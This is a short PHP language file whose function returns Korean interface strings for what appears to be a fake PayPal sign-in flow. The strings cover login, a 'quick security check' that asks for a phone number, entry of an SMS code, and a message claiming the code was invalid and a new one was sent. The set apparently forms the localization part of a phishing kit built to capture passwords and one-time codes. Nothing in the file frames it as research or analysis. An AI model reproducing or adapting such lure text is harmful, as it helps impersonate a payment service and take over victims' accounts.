<?php

function lang($phrase){
    static $lang = array(
        '1' => 'PayPal 계정에 로그인',
        '2' => '이메일 또는 휴대폰 번호',
        '3' => '비밀번호',
        '4' => '비밀번호를 잊으셨나요?',
        '5' => '로그인',
        '6' => '또는',
        '7' => '가입하기',
        '8' => '영어',
        '9' => '프랑스어',
        '10' => '스페인어',
        '11' => '中文',
        '12' => '빠른 보안 확인',
        '13' => '우리는 단지 당신이 맞는지 확인하기 위해 몇 가지 추가 정보가 필요합니다.',
        '14' => '문자 메시지 받기',
        '15' => '계속 진행하면이 전화 번호를 사용할 권한이 있으며이 세션에서 귀하의 신원을 확인하기 위해 텍스트 메시지를 수신하는 데 동의하는 것으로 간주됩니다. 운영자 요금이 적용될 수 있습니다. 우리는 귀하의 무선 운영자로부터 위험 및 사기 목적으로 사용하기 위해 가입자 및 장치 세부 정보를받을 수 있습니다.',
        '16' => '다음',
        '17' => '코드 입력',
        '18' => '재전송',
        '19' => '계속',
        '20' => '문의하기',
        '21' => '개인 정보',
        '22' => '법률',
        '23' => '정책 업데이트',
        '24' => '전 세계',
        '25' => '유효하지 않은 코드입니다. 새 코드를 보냈습니다.',
    );

    return $lang[$phrase];
}
?>
